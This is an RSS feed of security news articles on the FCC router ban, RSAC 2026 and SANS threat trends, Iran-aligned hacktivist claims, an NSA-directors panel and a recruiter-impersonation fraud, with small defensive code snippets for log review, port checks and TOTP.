* Segment networks: Isolate AI development frameworks from critical production databases and restrict outbound external access to only necessary, approved endpoints.

* Accelerate response capabilities: Organizations operating on scheduled, delayed patch cycles face an elevated risk during the critical hours following a disclosure. Bridging the gap between disclosure and remediation requires rapid, targeted response procedures.
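As a starting point for retroactive hunting, teams can sweep access logs for POSTs to the vulnerable endpoint (the malicious "data" parameter travels in the request body, so any POST here deserves review). The log line format below is an assumed combined-style format; adapt the pattern to your own logging.

```python
import re

# Matches POSTs to the public build endpoint named in the advisory.
ENDPOINT = re.compile(r"POST /api/v1/build_public_tmp/[^ /]+/flow")

def suspicious_lines(log_lines):
    """Return access-log lines that hit the vulnerable Langflow endpoint."""
    return [line for line in log_lines if ENDPOINT.search(line)]
```

A hit does not confirm compromise on its own, but any match on an unpatched instance warrants credential rotation and a closer look at outbound connections from that host.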

Securing AI pipelines is a collaborative effort. By taking these steps, security and engineering teams can ensure their organizations continue building innovative applications safely and confidently.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating the Security Impact of the FCC&apos;s Router Ban</title>
        <link>https://security.shortwaves.live/blog/e3921f5e-a7e6-4627-b246-1acfe74e79d9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e3921f5e-a7e6-4627-b246-1acfe74e79d9</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:06 GMT</pubDate>
        <description>The FCC&apos;s recent decision to halt approvals for specific foreign-made routers aims to protect national infrastructure, but industry researchers caution it could complicate hardware replacement cycles. Organizations can maintain strong defensive postures by focusing on operational security fundamentals while the hardware market adapts.</description>
        <content:encoded><![CDATA[
            The Federal Communications Commission (FCC) recently decided to add specific foreign-made routers to its national security risk list. While intended to protect infrastructure, this March 23 policy change introduces complexities that could inadvertently extend the lifecycle of older, less secure hardware for US consumers and small businesses over the long term.

The directive restricts the import of new consumer-grade router models manufactured outside the US. Organizations and consumers can continue using their current devices, and retailers may still sell previously approved models. However, the FCC will halt approvals for new foreign-made consumer routers, though it will review exemption requests as needed. The agency based this decision on findings from a White House-convened interagency body, which concluded that these devices present unacceptable national security risks.

## Assessing the national security context

The FCC documented concerns that unauthorized parties could introduce backdoors or tamper with routers to conduct mass surveillance, expose sensitive data, establish botnets, and gain unauthorized access to critical networks. According to the agency, security gaps in foreign-made routers have allowed intellectual property theft and network disruption. They specifically referenced the Volt Typhoon, Flax Typhoon, and Salt Typhoon security incidents as examples of events involving foreign-made equipment.

Currently, the vast majority of small office/home office (SOHO) and commercial-grade routers used in the US are manufactured internationally. Rebecca Krauthamer, CEO and co-founder of QuSecure, notes that supply chain risks are genuine, particularly at the national security level. The FCC's restriction focuses on limiting geopolitical exposure and reliance on foreign-controlled components, extending beyond device-level vulnerabilities.

"We are seeing a broader shift toward sovereign and trusted technology stacks in higher-security environments," Krauthamer explains, noting that the origin of infrastructure components is a meaningful consideration when sensitive data is involved.

## Potential side effects on hardware lifecycles

The heavy reliance on imported routers introduces questions about whether the restriction might prompt users to hold onto older, out-of-support devices. Krauthamer observes that while the policy does not mandate immediate replacement, it complicates future procurement. Many businesses rely on routers that have been in place for a decade or more, sitting directly in the critical path of their network traffic. Upgrading this infrastructure could soon involve a more constrained, potentially more expensive market with longer procurement cycles.

Jim Needham, senior managing director at FTI Consulting, explains that businesses might retain outdated equipment well beyond normal replacement cycles, which can weaken overall security postures. Since most routers require periodic replacement to maintain current security standards and keep pace with hardware advancements, the restriction could increase costs and cause operational friction. Because the ruling is prospective, however, these concerns apply primarily to future planning.

## Prioritizing operational security fundamentals

Several security researchers point out that device vulnerabilities are rarely tied directly to manufacturing origin. Instead, risk typically stems from operational gaps, such as default credentials, delayed patch management, and exposed management interfaces.

Jason Soroko, senior fellow at Sectigo, notes that unauthorized parties leverage these vulnerabilities across domestic and international hardware alike. He cautions against focusing solely on hardware origin rather than maintenance rigor, which could misdirect attention away from the more pervasive issue of administrative oversight.

For contrast, the European Union addresses device security through its Cyber Resilience Act. This legislation requires manufacturers selling connected devices in Europe to meet mandatory cybersecurity requirements, including secure defaults, vulnerability disclosure, and ongoing software support, regardless of where the hardware was built.

## Navigating future equipment replacements

Currently, the FCC's restriction serves as a forward-looking measure. The practical impact will surface as existing equipment reaches end-of-life and organizations enter a constrained replacement market. Pieter Arntz, a researcher at Malwarebytes, observed that only one US-made router, Starlink, is currently available in the consumer category affected by the FCC's policy.

The core challenge for the industry is whether the lack of domestic alternatives will spur new investment in US manufacturing or result in prolonged use of aging hardware. The outcome will depend heavily on how the FCC manages its exemption process. In the meantime, security teams can best protect their environments by focusing on rigorous operational hygiene: applying firmware updates promptly, disabling unnecessary remote management interfaces, and strictly controlling administrative credentials.
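As a quick illustration of that hygiene check, the sketch below probes a router address for management services that answer a TCP connection. The port-to-service mapping is an illustrative assumption, not a vendor or FCC recommendation; treat this as a starting point, not a complete audit.

```python
import socket

# Illustrative defaults: common router management services. Adjust the
# mapping for your own environment; this is a sketch, not a full audit.
DEFAULT_MGMT_PORTS = {23: "telnet", 80: "http", 443: "https", 8080: "alt-http"}

def exposed_mgmt_ports(host, ports=None, timeout=1.0):
    """Return the management services on `host` that accept a TCP connection."""
    ports = DEFAULT_MGMT_PORTS if ports is None else ports
    open_services = []
    for port, service in sorted(ports.items()):
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_services.append(service)
        except OSError:
            continue  # closed, filtered, or unreachable
    return open_services
```

Running a check like this against a router's WAN address from outside the network flags interfaces that should be disabled or restricted to internal management networks.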
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evolving Defense Methodologies and AI Automation at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/d4044e73-7f44-4f68-81f7-4c2aee40272e</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/d4044e73-7f44-4f68-81f7-4c2aee40272e</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:50 GMT</pubDate>
        <description>An analysis of security developments discussed at RSAC 2026, focusing on the acceleration of AI-driven threat methodologies and the necessary shift toward automated, human-validated defensive workflows. The findings emphasize the importance of verifiable software supply chains and deliberate attribution strategies.</description>
        <content:encoded><![CDATA[
            The RSAC 2026 Conference in San Francisco opened today with a notable shift in international cooperation and the dynamics of automated security operations. Following the withdrawal of U.S. federal agencies, including the FBI and NSA, in response to the conference appointing former CISA Director Jen Easterly as CEO, European cybersecurity leaders have assumed a more prominent role. This transition aligns with a critical period in which the speed of unauthorized operations is beginning to surpass traditional, manual defense capabilities, driven largely by the broader availability of artificial intelligence.

Discussions this morning prioritized "vibe coding," a term Dr. Richard Horne of the UK’s National Cyber Security Centre used to describe rapid, AI-assisted software generation. While these tools offer an alternative to the historically vulnerable manual coding process, they simultaneously lower the barrier for generating new software that can propagate unintended vulnerabilities at scale. SANS researchers presented supporting data today indicating that AI now forms the foundation of modern threat methodologies. Malicious actors are utilizing AI models to identify zero-day vulnerabilities in production software for as little as $116 in token costs. This economic shift means advanced discovery techniques are no longer exclusive to well-funded nation-states.

## The acceleration of automated operations

The technical gap between unauthorized access methods and defensive response is widening. Current estimates indicate that AI-driven operations proceed approximately 47 times faster than manual processes. For example, campaigns attributed to the Chinese state-sponsored group GTG 1002 show reconnaissance and lateral movement running at 90% automation. Under these conditions, a compromised credential can result in full administrative control of a cloud environment in under ten minutes.

This acceleration requires organizations to reevaluate incident handling, particularly in operational technology (OT) environments where visibility is often limited. A recent energy sector disruption in Poland demonstrated that without comprehensive OT logging, investigators cannot reliably determine whether a facility failure resulted from a targeted cyber event or a mechanical issue.

Defenders are also managing reputational risks generated by politically motivated threat actors. Iran-aligned groups, including Nasir Security, have applied sophisticated public relations tactics to overstate their operational impact today. By targeting smaller engineering and construction contractors within the supply chain, these groups exfiltrate legitimate internal documents and present them as evidence of unauthorized access at major energy organizations like Dubai Petroleum. The material impact on the primary targets remains negligible, but the psychological effect creates uncertainty. Similarly, groups like the 313 Team use the ambiguity of denial-of-service claims to maintain visibility in the news cycle.

Alongside high-level geopolitical shifts, senior professionals face targeted recruitment fraud. Threat actors impersonating Palo Alto Networks recruiters have spent the last several months executing highly personalized LinkedIn-based social engineering campaigns against executives. The methodology involves manufacturing a bureaucratic hurdle, informing the candidate that their resume failed an automated applicant tracking system (ATS) check—and directing them to a "third-party expert" who charges up to $800 for resume optimization. This campaign leverages the complexity of modern hiring processes to extract fees, demonstrating that the human element remains a primary vector for manipulation even as technical threats become more automated.

## Implementing human-in-the-loop defense

For security teams, these developments necessitate a transition toward proactive, automated validation. In the software supply chain, relying on standard bills of materials (SBOMs) is no longer sufficient. Organizations need to request verifiable proof of how software is built and implement automated patching cycles to match the speed of AI-generated threat methodologies. Regarding AI-assisted defense, experts agreed today that while open-source tools like Protocol SIFT can compress a two-week investigation into 15 minutes, human analysts must remain the final decision makers. Current AI lacks the contextual awareness to reliably interpret evidence, and a confident but incorrect verdict from an AI tool can waste critical hours during an active security incident.

Strategic guidance on public attribution is also evolving. Panelists cautioned against attributing incidents to nation-states as a method of diverting responsibility. While identifying a sophisticated adversary might seem advantageous for public relations, it frequently extends the news cycle and introduces insurance complications, such as "act of war" exclusions. Legal experts advise maintaining a strict "investigation ongoing" stance rather than offering a "no comment." This approach helps the organization control the narrative without making probabilistic claims that could invite secondary actions from the threat actors.

Looking toward the implementation of the EU Cyber Resilience Act in late 2027, the gap between government policy and private sector implementation remains a point of friction. Former NSA directors noted today that the absence of a unified federal data privacy framework or major cyber legislation in the U.S. continues to complicate defensive synchronization. While the thresholds for kinetic military responses to cyber incidents remain at the discretion of the presidency, the day-to-day responsibility for defense rests on private organizations. These entities must secure their data, their supplier ecosystems, and the AI tools utilized to build their infrastructure.

Significant gaps remain in understanding how autonomous agents will interact within OT environments and the full vulnerability footprint of "vibe coding." However, adopting accelerated, human-in-the-loop defensive workflows provides a viable path forward in an environment where the speed of unauthorized operations is no longer limited by manual interaction.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating the technical impact and claims of Iran-aligned threat actors in the Gulf region</title>
        <link>https://security.shortwaves.live/blog/a33b5920-c628-4c84-8e2b-33a1eda53cc7</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/a33b5920-c628-4c84-8e2b-33a1eda53cc7</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:50 GMT</pubDate>
        <description>While politically motivated threat groups aligned with Iran claim to have caused widespread disruption in the Gulf region, technical evidence indicates their material impact remains limited. This analysis examines how these groups use supply chain compromises and public relations tactics to overstate their access, and outlines how security teams can protect their infrastructure.</description>
        <content:encoded><![CDATA[
            Since the onset of recent geopolitical conflict, hard evidence shows that politically motivated, Iran-aligned threat actors have had limited verifiable impact in the Gulf region, despite their widely publicized claims.

Whenever a major geopolitical event occurs, both financially motivated threat actors and the cybersecurity community increase their activity. Malicious cyber activity reliably follows major headlines, and security researchers monitor each news cycle for rising threats, providing a secondary layer of data on the unfolding events.

The recent conflict involving Iran follows this pattern. Data from Bitdefender indicates that since February 28, the day of the ayatollah's assassination, the rate of unauthorized email campaigns directed at Gulf countries rose by an average of 130%. This activity surged immediately, stayed elevated, and at its peak reached nearly four times its pre-war rate. The measurable increase in activity is clear.

A rise in activity, however, does not automatically translate to a proportional security impact. Security researchers maintain varying assessments of how much risk Iran-aligned threat groups present. When evaluating hard evidence, analysts have found a modest material impact resulting from this anticipated surge.

## Case study: Nasir Security

There is a notable gap between what many Iran-aligned groups claim to accomplish and their verifiable technical impact.

The group known as "Nasir Security," which has aligned itself with Hezbollah and the Alawite ethnic group in Syria, illustrates this pattern. After an initial appearance in October 2025 and a subsequent pause, the group resumed activity on March 10. In the following two weeks, the group claimed to have compromised three Middle Eastern oil and gas companies: Dubai Petroleum in the United Arab Emirates (UAE), CC Energy in Oman, and Al Safi, a company operating gas stations in Saudi Arabia and the wider region.

While these claims appear severe on the surface, technical analysis reveals a different reality. The group vastly overstated its access. "The group is attacking [related] supply chain vendors involved in engineering, safety, and construction," explains Resecurity COO Shawn Loveland.

The logic behind this methodology is straightforward. "Contractors' digital identity information is a typical 'low-hanging fruit,' making them an easy target for business email compromise (BEC) and account takeover (ATO)," Loveland notes. "The actors target contractors, as they may store various engineering documentation and internal files during collaboration with energy companies on their projects. That data is used as a 'shiny object' to claim a breach of the energy company itself."

Nasir Security has accessed and exposed legitimate internal documents, but not from the primary targets. In the case of Dubai Petroleum, Resecurity’s analysis indicates the group falsely claimed to have exfiltrated more than 413GB of data from the company. Instead, the group obtained a smaller set of authentic internal reports, maps, and technical schemes from a third-party contractor. While organizations must remain vigilant against these documents being used in future spear-phishing campaigns, the primary goal of the release was to fabricate legitimacy for the group's public claims.

The objective of these campaigns centers heavily on psychological impact. "The actors attempted to capitalize on the authentic documents (stolen from a third party) and the complexity of investigating the point of compromise, which can be time-consuming, leaving the audience in uncertainty," Loveland states. "Such tactics are widely used by threat actors to plant misleading narratives."

## Verifying high-profile claims

Not all politically motivated threat groups leave behind verifiable evidence, such as downloadable data sets. Analysts often find it challenging to verify claimed activity because many lower-level groups rely on methods that are difficult to definitively disprove or are open to broad interpretation.

For example, threat actors frequently claim denial-of-service (DoS) disruptions against websites that actively block automated uptime checks. Pascal Geenens, vice president of cyber threat intelligence at Radware, explains that "'Defacement' can mean anything from a full website compromise to posting a picture in a comment section and sharing the direct link. System compromise claims similarly run the gamut, from genuinely sensitive intrusions to publicly exposed cameras or unprotected IoT dashboards."

The "313 Team" serves as an example of an Iran-aligned group leveraging this ambiguity. The group recently claimed DoS shutdowns of government and military services in Bahrain and Kuwait. Public reporting indicates both governments experienced minor disruptions, but the incidents either lacked the impact 313 Team claimed or were traced to other threat groups.
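One practical response to this ambiguity is to probe a claimed target directly rather than relying on third-party uptime checkers, which targets often block. The sketch below is a minimal illustration with assumed classification labels; it distinguishes a server that is unreachable from one that is up but returning errors, which on its own undermines a shutdown claim.

```python
from urllib import error, request

def classify_probe(url, timeout=5.0):
    """Probe `url` with a HEAD request and classify the outcome."""
    try:
        with request.urlopen(request.Request(url, method="HEAD"),
                             timeout=timeout):
            return "reachable"
    except error.HTTPError:
        # The server answered, just with an error status: it is not "down."
        return "responding-with-error"
    except (error.URLError, OSError):
        # Consistent with a DoS claim, but not proof: blocking or routing
        # issues look identical from a single vantage point.
        return "unreachable"
```

Probing from several network vantage points, and repeating over time, strengthens the assessment considerably compared with a single check.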

"With hacktivist activity, the claim is part of the attack itself," says Justin Moore, senior manager of threat intelligence for Palo Alto Networks' Unit 42. Unit 42 tracked a surge of incident claims at the start of the conflict that lacked verifiable evidence but still generated public concern.

"The narrative that they are operating everywhere is critical to the psychological aspect of their activity, keeping the looming potential threat of attack by them in the news cycle," Moore says. "For an organization, the challenge is managing the reputational fog of war that these groups intentionally create the moment they post on Telegram."

As a baseline for evaluating risk, Geenens notes that groups believed to operate as proxies for a nation-state carry more weight in their claims than self-proclaimed anonymous channels. For instance, Handala, widely assessed to be a false flag operation for Iran's Ministry of Intelligence and Security (MOIS), is the operation most frequently associated with concrete, verifiable cyber activity in March.

## Evaluating the threat scene

Security researchers maintain different perspectives on the severity of the risk these aligned groups pose to organizational infrastructure.

Matt Hull, vice president of cyber intelligence and response at NCC Group, suggests organizations should prepare for more severe outcomes. "While many hacktivist actions are indeed noisy and designed for psychological effect, we have observed a significant shift toward destructive and high-consequence operations," Hull says. He points to groups targeting critical infrastructure and deploying wipers. He also highlights the role of Iran's reported "Electronic Operations Room" (EOR) in coordinating proxy activities.

"The establishment of the Electronic Operations Room (EOR) has synchronized hacktivist groups, allowing them to act as a force multiplier for state objectives," Hull states. "Even if an individual attack seems minor, the cumulative effect creates a massive drain on defensive resources and provides a smoke screen for more sophisticated state-sponsored actors to move undetected."

Loveland offers a more measured assessment of the current situation. "In fact, none of the Iran-linked, pro-Iranian groups (including Handala) or state-sponsored groups are making any meaningful impact on the Iran conflict, as confirmed by numerous independent assessments and our threat analysis," he states. "Iran and its proxies are orchestrating such campaigns on behalf of groups like 'Nasir Security' to sow uncertainty and create the optics of cyberattacks."

To protect operations against these methodologies, security teams should focus on securing vendor and supply chain access. Implementing strict identity controls and multi-factor authentication mitigates the risk of the business email compromise and account takeover tactics these groups rely upon. Additionally, establishing clear communication protocols helps organizations effectively navigate the reputational uncertainty these threat actors attempt to create.
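Multi-factor authentication can take several forms; one common second factor is the time-based one-time password (TOTP) defined in RFC 6238, which derives a short-lived code from a shared secret so that a phished password alone is not enough for account takeover. The sketch below is a minimal reference implementation of the HMAC-SHA1 variant, not production code (a real deployment also needs rate limiting, replay protection, and secure secret storage).

```python
import hashlib
import hmac
import struct
import time

def totp(secret, for_time=None, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1 variant): a one-time code derived from a
    shared secret and the current `step`-second time window."""
    now = time.time() if for_time is None else for_time
    counter = struct.pack(">Q", int(now // step))  # 8-byte big-endian counter
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                        # RFC 4226 dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

The implementation can be checked against the published test vectors in RFC 6238 Appendix B, which use the ASCII secret "12345678901234567890" and 8-digit codes.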
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Former NSA Directors Discuss Policy Thresholds for Cyber Operations at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/a712dbd3-36f4-442e-b3e7-295bdc860614</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/a712dbd3-36f4-442e-b3e7-295bdc860614</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:50 GMT</pubDate>
        <description>A panel of four former National Security Agency directors at RSAC 2026 examined US strategy on state-level cyber operations, the thresholds for military response, and the current state of public-private collaboration in cybersecurity.</description>
        <content:encoded><![CDATA[
            When it comes to cyber incidents, what crosses the "red line" and justifies a kinetic military response?

That was a central question posed to four former National Security Agency (NSA) directors and US Cyber Command leaders, who evaluated the US government's current cybersecurity strategy during a keynote panel at the RSAC 2026 Conference in San Francisco on Tuesday.

The keynote, titled "Inside Offensive Cyber: Lessons from Four NSA Directors," featured Tim Haugh, Paul Nakasone, Mike Rogers, and Keith Alexander. Alexander was appointed by former President Barack Obama to establish and lead the US Cyber Command. He was succeeded in the post by Rogers, Nakasone, and Haugh, respectively.

The panel followed the release of President Donald Trump's cyber strategy earlier this month, which prioritized offensive capabilities and deterrence. In a military context, offensive cyber operations cover a range of activities. This can include disrupting threat actor infrastructure and conducting surveillance against adversaries, tactics the US has frequently been accused of using against nations such as China. It also encompasses incidents like Stuxnet, which caused significant physical disruption to Iran's nuclear program and has been attributed to the US and Israel, though neither government has formally confirmed involvement.

The 50-minute discussion, moderated by venture capitalist Ted Schlein, covered how the US approach to active cyber operations has evolved from a highly classified concept to a publicly acknowledged strategy. The panelists discussed how the NSA formed the foundation for US military cyber capabilities, the increasing role of the private sector in national defense, and the premise that active capabilities are required to protect the country.

Alexander noted that early detractors of the US moving into offensive cyber operations argued against the Internet becoming a domain for international conflict. "It already is," he said. "Because it is, we have to be the best at it, because our nation is the most digitized nation in the world."

While the panelists generally supported the use of active cyber operations, two of the primary focal points of the discussion were the definition of the "red line" where a cyber incident might prompt kinetic military force—a response the Obama administration formally reserved the right to use in 2011—and whether the current federal government is adequately prioritizing cybersecurity.

## Determining thresholds for response

During the panel, Schlein asked how government officials determine the exact threshold for cyber incidents that reach a critical level of severity.

Nakasone approached the question directly. "Whatever the president says [the red line] is, that's it," he said. "That's the determination, and we can all think what it is, but he's the one that determines whether or not we're going to take some type of distinct action based upon this."

Rogers expanded on this process, noting that during his time working with President Obama, he advocated for establishing specific criteria for when a kinetic response might be appropriate, such as when a cyber incident directly causes a loss of human life.

Addressing the operational mechanics of responding to adversarial actions, Haugh explained that commanders aim to "give options to our policymakers." This involves presenting varying levels of response and their associated risks, allowing decision-makers to select a course of action they are comfortable authorizing.

Alexander emphasized that commanders "need to give the president and the National Security Council flexibility to respond." He argued against rigid rules that eliminate context, noting there may be scenarios where the president decides that launching a physical military response to a cyber incident is not the most strategic course of action, even if the incident meets predefined criteria. Consequently, Alexander advised against Congress codifying these response policies into law, stating, "you don't want Congress legislating something that they don't really understand."

## Government involvement and industry collaboration

Schlein later asked the panel, "Does this country care that much about cyber?" 

The question arrives amid significant structural changes in the federal government. The Cybersecurity and Infrastructure Security Agency (CISA) has recently faced massive layoffs and forced reassignments, and the Cyber Safety Review Board was effectively shuttered shortly after Trump's inauguration. At this year's RSAC Conference, the US government had effectively zero official presence, a sharp contrast to previous years. Federal agencies abruptly pulled out of the event following the hiring of former CISA Director Jen Easterly as RSAC CEO in January.

The panelists offered varying perspectives on the current state of federal cybersecurity prioritization. Alexander took a diplomatic stance on the workforce, stating, "I think the key players in cyber continue to do what they need to do and train, get ready and do their operation. … My experience is they're out there working just as hard as they ever were and they're progressing."

Rogers offered a more direct critique of the current administration's approach to cybersecurity policy.

"I see a private sector and network owners that are very energized and focused. I see a government that's unwilling to expend political capital to really drive fundamental change in cyber," Rogers said. "And it's a reflection of the fact that, politically, we are so divided and as a society, we are so divided. Think about it, we're the largest economy in the world. We don't have a single federal data privacy framework. We don't have a single major piece of cyber legislation, and compare that with the rest of the Five Eyes as examples."

Rogers noted that the current environment "frustrates the hell out of me personally," pointing to a distinct lack of cooperation between the federal government and the commercial cybersecurity industry. "We need political leadership synchronized with the private sector to get where we need to go," he said. "And neither can do it by themselves. It just isn't there."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>SANS 2026: Top five emerging threat methodologies and defensive strategies</title>
        <link>https://security.shortwaves.live/blog/d2f8d56a-3042-4f39-bbb6-c038b7258d9a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/d2f8d56a-3042-4f39-bbb6-c038b7258d9a</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:49 GMT</pubDate>
        <description>At the RSAC 2026 Conference, SANS researchers detailed five ways threat actors are integrating artificial intelligence into their operations. The findings emphasize the need for enhanced operational technology visibility, verifiable supply chain data, and AI-supported defensive workflows to maintain organizational security.</description>
        <content:encoded><![CDATA[
            Every year, SANS Institute researchers present top threat methodologies at the RSAC Conference. The 2026 presentation in San Francisco marked a shift in the threat environment: artificial intelligence now underpins all five key areas.

"We would be lying to you if we pointed out a trend in attacks that did not involve AI," SANS president Ed Skoudis explained to the audience during a keynote session. "That is just where we are in the industry." 

## AI-generated zero-days and shifting costs

Historically, discovering zero-day vulnerabilities was a resource-intensive process limited to well-funded, state-sponsored groups. Joshua Wright, SANS Institute faculty fellow and senior technical director, notes that AI has fundamentally changed this cost structure. Independent researchers have recently identified zero-day vulnerabilities in widely deployed production software for as little as $116 in AI token costs. This represents a massive reduction from the millions of dollars previously required to find and validate these vulnerabilities.

"Attackers were already faster than us," Wright said. "AI has made the gap unbridgeable at our current pace."

To adapt, organizations must increase their defensive cadence. Wright advises implementing automated patching, refining validation frameworks, and adopting AI-supported defense tools to match the speed of incoming threats.

## Supply chain risks and third-party exposure

Over the past year, two-thirds of organizations experienced a software supply chain security incident. Wright reported a measurable increase in third-party involvement in unauthorized access events, alongside a surge in malicious packages published to open-source registries.

For example, the Shai-Hulud worm infected over a thousand open-source packages and exposed 14,000 credentials across 487 organizations. In a separate event, a China-affiliated group maintained unauthorized access to the Notepad++ update infrastructure for six months, selectively distributing backdoors to targets in the energy, finance, government, and manufacturing sectors.

"Your attack surface is not the software you chose. It is the entire ecosystem of suppliers behind it," Wright said.

Organizations need to plan for supplier compromises before they occur. This means moving beyond standard software bills of materials to demand verifiable proof of how software is built. Security teams should also evaluate every update channel and developer tool as a potential third-party risk.
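One small, concrete piece of that verification is refusing to install any artifact whose content hash does not match a value pinned at review time (signed build attestations such as SLSA provenance go further). The sketch below is illustrative only: the artifact name and digest are invented for the example, not real package hashes.

```python
import hashlib
import hmac

# Hypothetical pin file mapping artifact names to expected SHA-256 digests.
# Both entries below are made-up values for illustration.
PINNED_DIGESTS = {
    "example-lib-1.2.3.tar.gz":
        "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824",
}

def verify_artifact(name, payload):
    """Accept `payload` only if its SHA-256 digest matches the pinned value."""
    expected = PINNED_DIGESTS.get(name)
    if expected is None:
        return False  # unpinned artifacts are treated as untrusted
    actual = hashlib.sha256(payload).hexdigest()
    return hmac.compare_digest(actual, expected)  # constant-time comparison
```

A check like this belongs in the CI/CD step that fetches dependencies, so a compromised update channel (as in the Notepad++ incident above) cannot silently swap artifact contents after review.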

## Operational technology (OT) complexity and logging gaps

Robert Lee, SANS Institute fellow and Dragos CEO, discussed a growing accountability crisis in operational technology environments. Following an OT incident, critical network activity logs and diagnostic evidence frequently evaporate or are entirely unavailable due to limited infrastructure visibility.

During a December 2025 incident involving Poland's distributed energy resources, investigators confirmed a disruption had occurred. However, a lack of OT monitoring meant they had no visibility into what the threat actor did inside the systems following the initial unauthorized access.

In another instance, a state-level actor targeted a facility that had no visibility into its own infrastructure. A month later, the facility exploded. Investigators still cannot definitively state whether the destruction was the result of a targeted security event or an industrial accident.

"Governments are not going to be comfortable not knowing what happened in their critical infrastructure and why someone died," Lee said. "That scenario is unacceptable, and it is already happening."

With agentic AI now operating in OT environments, Lee warned that organizations must prioritize network visibility immediately, rather than waiting for a critical failure to force the issue.

## Artificial intelligence in digital forensics and incident response

Organizations deploying AI for digital forensics and incident response (DFIR) without strict training, validation frameworks, and investigative discipline introduce significant risk into their processes. Heather Barnhart, head of faculty and senior forensics expert at the SANS Institute, explained that AI currently lacks the ability to interpret evidence contextually the way a human analyst does.

When an AI tool renders a confident but incorrect verdict, it consumes valuable time and resources during an active response scenario.

"Most breaches don't fail because of tools," Barnhart said. "They fail at decision points. AI cannot be the decision point." 

Barnhart also noted that threat actors are targeting unmonitored vectors like AI notetaking applications, expanding the organizational digital footprint well beyond traditional networks. To manage this, trained analysts must retain decision-making authority at every stage of an investigation.

## Autonomous defense and accelerating response

Security researchers estimate that AI-driven operations move 47 times faster than manual approaches. A threat actor can now take a compromised credential and establish full administrative control in an AWS environment in less than 10 minutes.

A recent campaign documented by Anthropic, tracked as "GTG 1002" and attributed to a Chinese state-sponsored group, targeted over 30 government and financial entities. The group used AI to automate up to 90% of the operation, managing reconnaissance and lateral movement largely without human intervention.

"They have their artificial intelligence," Lee said. "Now we build ours."

To close the speed gap, Lee pointed to Protocol SIFT, an open-source initiative involving the SANS Institute. The system uses AI to organize defensive workflows, surface data, and coordinate tools, while leaving validation and decision-making to human analysts.

"The goal is to accelerate analysts, not replace them, and early results suggest that the model can significantly compress response times," Lee said.

During a recent test involving a sophisticated two-week incident scenario, an analyst used Protocol SIFT to complete the entire investigation in under 15 minutes. The workflow included identifying the malicious software, mapping unauthorized movements, aligning tactics, techniques, and procedures (TTPs) to known frameworks, and determining the appropriate remediation steps. Coordinating across the global security community and empowering defenders with these accelerated tools provides the necessary edge against automated threats.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat Actors Impersonate Palo Alto Networks Recruiters in Employment Fraud Campaign</title>
        <link>https://security.shortwaves.live/blog/e12912e6-d037-40c3-a096-d814508fe32f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e12912e6-d037-40c3-a096-d814508fe32f</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:49 GMT</pubDate>
        <description>Unauthorized actors are targeting senior-level professionals with a sophisticated social engineering campaign that mimics the Palo Alto Networks recruitment process. By understanding this methodology and recognizing manufactured bureaucratic barriers, organizations and candidates can better safeguard their professional identities and financial security.</description>
        <content:encoded><![CDATA[
            Since August of last year, threat actors have conducted a series of targeted social engineering campaigns aimed at senior-level professionals. By impersonating recruiters from Palo Alto Networks, these unauthorized parties seek to establish trust and ultimately defraud candidates under the guise of the hiring process.

Researchers at Palo Alto Networks’ Unit 42 have monitored this activity over the past seven months. According to a recently published threat report, the campaign relies heavily on data gathered from public sources, including LinkedIn, to craft highly personalized communications.

"The specific attack vector uses social engineering to manufacture a bureaucratic barrier regarding the candidate's curriculum vitae (CV) and to push the candidate toward taking actions such as reformatting their resumes for a fee," Unit 42 senior manager Justin Moore explained.

Unit 42 has documented multiple reports of this methodology. The outreach typically incorporates flattering language, specific career milestones from the targeted professionals' LinkedIn profiles, and legitimate corporate logos within email signatures to simulate authenticity.

If the sequence proceeds, the targeted candidates are instructed to pay a fee ranging from $400 to $800 to clear an administrative hurdle. The goal is to deceive professionals into believing they are advancing in a genuine recruitment process while extracting financial payments.

## Recruitment fraud methodology

The threat actors initiate contact via emails that appear as legitimate outreach from Palo Alto Networks representatives. This initial stage is designed to build rapport with the candidate.

During this phase, the unauthorized parties use psychological tactics, expressing admiration for the candidate's work history. By referencing specific career milestones scraped from public professional networks, they create the impression that the company has been actively monitoring the candidate’s trajectory for a specific role.

Once engagement is established, the individuals manufacture a crisis to halt the supposed recruitment process. They falsely notify the candidate that their resume failed to pass the company's applicant tracking system (ATS). An ATS is a standard online tool used to evaluate resumes for formatting, structure, and keyword optimization before a human review.

"This psychological tactic increases the urgency and willingness of the victim to comply with the attacker's offer of 'executive ATS alignment,'" Moore noted.

The "recruiter" then introduces a purported third-party expert who offers tiered pricing to resolve the formatting issue. The fraudulent packages include an "executive ATS alignment" for $400, a "leadership positioning package" for $600, and an "end-to-end executive rewrite" for $800.

"In reported incidents, the 'recruiter' then implies that the 'review panel' has already begun, and that the candidate needs to update their CV within a set timeframe," Moore wrote. "The 'expert' then communicates that they can deliver the CV within only a matter of hours, which is within the ostensible review window."

This artificial sense of urgency is designed to pressure the candidate into paying for the unnecessary service. Unit 42 has not publicly disclosed whether any reporting individuals completed the payments.

